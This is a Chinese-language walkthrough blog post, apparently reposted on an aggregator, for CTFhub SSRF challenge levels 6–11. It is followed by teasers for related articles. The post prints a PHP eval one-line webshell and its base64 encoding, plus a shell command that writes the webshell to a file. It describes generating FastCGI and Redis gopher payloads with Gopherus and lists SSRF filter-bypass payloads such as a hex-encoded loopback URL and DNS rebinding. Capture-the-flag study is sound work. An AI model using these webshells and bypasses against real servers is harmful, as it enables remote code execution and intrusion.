CTFhub通关攻略-SRRF篇【6-11关】

2024-08-29 06:20
文章标签 攻略 ctfhub 通关 srrf

本文主要是介绍CTFhub通关攻略-SRRF篇【6-11关】,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

06 FastCGI协议

漏洞原理

https://blog.csdn.net/mysteryflower/article/details/94386461

该关需要将一句话木马写入题目网站下,一句话木马要进行base64编码确实用双引号才可以。

一句话木马

<?php @eval($_POST[cmd]);?>

base64编码

PD9waHAgQGV2YWwoJF9QT1NUW2NtZF0pOz8+

 打开kali,在Gopherus中打开终端

Gopherus---网盘自取

链接: https://pan.baidu.com/s/1xQjNOpsgpjFuMVOT1eIutg 提取码: zxin

 使用Python运行gopherus,带参数

python2 gopherus.py --exploit fastcgi

之后让填写一个php文件的目录,而题目网站中就有一个index.php

所以将此文件的网址给他就可以

/var/www/html/index.php

 下一步,让给它一个命令,这里,我们就要讲一句话木马写入到一个php文件中

echo "PD9waHAgQGV2YWwoJF9QT1NUW2NtZF0pOz8+" | base64 -d > 2.php

 回车后得到一串payload,将这串payload进行URL编码

直接给到题目链接,这样我们的木马就写入到了题目链接中

 接下来进行远程操控,这里使用的工具是菜刀

填写木马的网址和密码,将编码方式改为UTF-8就可以了

进入到网站根目录中,找到Flag文件里面就是目标Flag

07 Redis协议

这一关和上一关的fastcgi是一样的,只是服务变为了Redis

使用gopherus工具后,会先问你你想要ReverseShell还是PHPShell,这里选择后者

之后也是需要填一下目录,但是不用填文件名

下一步写一句话木马,不用base64编码

在之后得到一串payload

接下来的步骤和上一关一样,这里就不在赘述

08 URL BYpass

这一关是我们填写的URL必须包含他给的这一串网址 http://notfound.ctfhub.com

这里使用@符号进行书写,在@符号和http://的中间加的东西不影响网址的作用,所以构造payload

如下图所示


09 数字IP BYpass

这一关输入常规的的http://127.0.0.1/flag.php发现过滤了127、172还有@

所以这里将127改为十六进制,就是0x7f(0x是十六进制前缀)

测试发现网站把 . 也过滤了,那我们用0将 . 代替

就得到的最终的payload

http://0x7f000001/flag.php

这样就得了目标payload

10 302跳转 BYpass

这一关再输入常规的payload后提示我们这个IP坏的

就是不让我们使用这个IP

那我们就是用域名将IP替换

127.0.0.1的域名就是localhost

这样就得到了目标Flag

11 DNS重绑定 BYpass

这一关是需要DNS重绑定,具体概念可以参考下面链接

DNS重绑定介绍

接下来我们需要点进题目的附件中,会跳转到知乎的网站上,里面有一个链接,如下图

进入到网址之后,我们将127.0.0.1和127.0.0.2分别填入,在下面框中得到两个IP的十六进制的URL,将这个URL替换题目网站的127.0.0.1,就可以得到目标Flag

这篇关于CTFhub通关攻略-SRRF篇【6-11关】的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1117088

相关文章

大模型研发全揭秘:客服工单数据标注的完整攻略

在人工智能(AI)领域,数据标注是模型训练过程中至关重要的一步。无论你是新手还是有经验的从业者,掌握数据标注的技术细节和常见问题的解决方案都能为你的AI项目增添不少价值。在电信运营商的客服系统中,工单数据是客户问题和解决方案的重要记录。通过对这些工单数据进行有效标注,不仅能够帮助提升客服自动化系统的智能化水平,还能优化客户服务流程,提高客户满意度。本文将详细介绍如何在电信运营商客服工单的背景下进行

电脑桌面文件删除了怎么找回来?别急,快速恢复攻略在此

在日常使用电脑的过程中,我们经常会遇到这样的情况:一不小心,桌面上的某个重要文件被删除了。这时,大多数人可能会感到惊慌失措,不知所措。 其实,不必过于担心,因为有很多方法可以帮助我们找回被删除的桌面文件。下面,就让我们一起来了解一下这些恢复桌面文件的方法吧。 一、使用撤销操作 如果我们刚刚删除了桌面上的文件,并且还没有进行其他操作,那么可以尝试使用撤销操作来恢复文件。在键盘上同时按下“C

企业大模型落地的“最后一公里”攻略

一、大模型落地的行业现状与前景 大模型在多个行业展现出强大的应用潜力。在金融行业,沉淀了大量高质量数据,各金融平台用户数以亿计,交易数据浩如烟海。利用大模型分析处理这些数据,金融机构可以预测用户行为偏好,更高效、准确评估客户风险,实时监测交易和市场波动,及时制定策略。IDC 调研显示,超半数的金融机构计划在 2023 年投资生成式人工智能技术。 在科技领域,商汤人工智能大装置为大模型企业提

xss-labs-master通关教程

一.level1 先来进行一下代码审计 <?php ini_set("display_errors", 0);//关闭错误显示$str = $_GET["name"]; //接受URL来的get形式的name传参echo "<h2 align=center>欢迎用户".$str."</h2>";//在网页输出,并不是echo执行的,而是echo把HTML代码发送到浏览器,浏览器对发送的H

CTFHub技能树-Git泄漏-Index

目录 一、Git索引(Index)的基本概念 二、解题过程 主旨:使用git泄漏恢复源代码 方法一:使用GitHack手动恢复 方法二:直接使用Git_Extract获取网站源代码拿去flag   当前大量开发人员使用git进行版本控制,对站点自动部署。如果配置不当,可能会将.git文件夹直接部署到线上环境。这就引起了git泄露漏洞。请尝试使用BugScanTeam的Gi

2025计算机毕业设计选题攻略

博主介绍:✌全网粉丝10W+,前互联网大厂软件研发、集结硕博英豪成立工作室。专注于计算机相关专业毕业设计项目实战6年之久,选择我们就是选择放心、选择安心毕业✌ 🍅由于篇幅限制,想要获取完整文章或者源码,或者代做,拉到文章底部即可看到个人VX。🍅 2023年 - 2024年 最新计算机毕业设计 本科 选题大全 汇总 计算机专业毕业设计之避坑指南(开题答辩选导师必看) 感兴趣的可以先收藏起来,还

《论软件设计模式及其应用》通关范文,软考高级系统架构设计师

论文真题 设计模式(Design Pattern)是一套被反复使用的代码设计经验总结,代表了软件开发人员在软件开发过程中面临的一般问题的解决方案和最佳实践。使用设计模式的目的是提高代码的可重用性,让代码更容易被他人理解,并保证代码可靠性。现有的设计模式已经在前人的系统中得以证实并广泛使用,它使代码编写真正实现工程化,将已证实的技术表述成设计模式,也会使新系统开发者更加容易理解其设计思路。根据

大数据面试通关手册|Hbase面试题(二)

⭐⭐欢迎关注博客主页:https://blog.csdn.net/u013411339⭐⭐欢迎点赞 👍 收藏 ⭐留言 📝 ,欢迎留言交流!⭐⭐本文由【王知无】原创,首发于 CSDN博客!⭐⭐本文首发CSDN论坛,未经过官方和本人允许,严禁转载! 技术背景 起源于谷歌旧三篇论文中bigtable。 设计目的 为了解决大数据环境中海量结构化数据的实时读写问题。为了弥补hadoop生态中没有

大数据面试通关手册 | Kylin入门/原理/调优/OLAP解决方案和行业典型应用

Kylin入门/原理/调优/OLAP解决方案和行业典型应用一网打尽。 一:背景历史和使命 背景和历史 现今,大数据行业发展得如火如荼,新技术层出不穷,整个生态欣欣向荣。作为大数据领域最重要的技术的 Apache Hadoop 最初致力于简单的分布式存储,然后在此基础之上实现大规模并行计算,到如今在实时分析、多维分析、交互式分析、机器学习甚至人工智能等方面有了长足的发展。 2013 年年初,在

大数据面试通关手册|Hbase面试题(一)

⭐⭐欢迎关注博客主页:https://blog.csdn.net/u013411339 ⭐⭐欢迎点赞 👍 收藏 ⭐留言 📝 ,欢迎留言交流! ⭐⭐本文由【王知无】原创,首发于 CSDN博客! ⭐⭐本文首发CSDN论坛,未经过官方和本人允许,严禁转载! 1.Hbase调优 HBase高可用 在HBase中Hmaster负责监控RegionServer的生命周期,均衡RegionServ